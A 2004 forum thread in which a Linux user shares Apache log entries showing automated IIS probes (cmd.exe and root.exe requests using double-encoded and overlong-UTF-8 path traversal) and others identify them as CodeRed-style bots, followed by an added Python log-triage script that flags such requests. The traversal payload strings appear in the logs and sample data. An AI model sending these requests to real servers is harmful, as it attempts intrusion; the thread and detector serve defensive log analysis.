- 06-26-2004 #1Linux User
- Join Date
- Jun 2003
- Location
- Huntington Beach, CA
- Posts
- 390
going through apache logs, found something wacky
Well I'm starting to mess around with my apache logs a bit figuring out some stuff I can do with them and I keep coming across little sections of the following throughout:
Code:
24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "- "
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
I'm not sure what it is, looks like a hack attempt, but my guess is it's not good, any thoughts?
- 06-26-2004 #2Linux Guru
- Join Date
- Oct 2001
- Location
- Täby, Sweden
- Posts
- 7,578
It's just automated crackbots on the internet doing subnet scanning for IIS vulnerabilities (I'd guess those are the old CodeRed bots). The best thing you can do is report them to their ISPs, so that at least they're made aware that they are cracked.
- 06-26-2004 #3
I'd say a stupid hacker who doesn't realize it's a Linux box

He's trying to get access to your box I'd say.
yikes,
-lakerdonald
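
Added example, not part of the thread: one way to triage an Apache access log for the probes shown in the first post, by peeling percent-encoding layers and flagging requests for Windows binaries, multi-layer encoding (`%255c`, `%%35c`) and overlong UTF-8 bytes (`%c0%af`). The function names and the sample lines are constructed for illustration, and the addresses are documentation ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in Apache combined format, modelled on the requests in the
# first post; the client addresses are documentation ranges, not real hosts.
SAMPLE = r'''
192.0.2.10 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
192.0.2.10 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
192.0.2.10 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
192.0.2.10 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
198.51.100.7 - - [07/Jan/2004:15:40:02 -0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.strip().splitlines()

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
WIN_BINARY = re.compile(rb'(cmd|root)\.exe', re.I)
OVERLONG = re.compile(rb'[\xc0\xc1]')  # bytes 0xC0/0xC1 are never valid in UTF-8

def decode_layers(target, max_rounds=4):
    """Percent-decode until stable; return (bytes, rounds that changed the data)."""
    data, rounds = target.encode('latin-1'), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(line):
    """Return (ip, status, reasons) for a log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw, rounds = decode_layers(m.group(2))
    checks = {'windows-binary': WIN_BINARY.search(raw),
              'multi-layer-encoding': rounds >= 2,
              'overlong-utf8': OVERLONG.search(raw)}
    return m.group(1), int(m.group(3)), {name for name, hit in checks.items() if hit}

def summarize(lines):
    """Per source IP: probe count, reasons seen, and probes not answered with 4xx."""
    out = defaultdict(lambda: {'probes': 0, 'reasons': set(), 'not_rejected': 0})
    for ip, status, reasons in filter(None, map(classify, lines)):
        if reasons:
            out[ip]['probes'] += 1
            out[ip]['reasons'] |= reasons
            # Anything other than a 4xx answer to a probe deserves a closer look.
            out[ip]['not_rejected'] += int(not (400 <= status < 500))
    return dict(out)
```

A `not_rejected` count of zero, as in the thread's log where every request got a 404 or 400, means the server turned every probe away.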


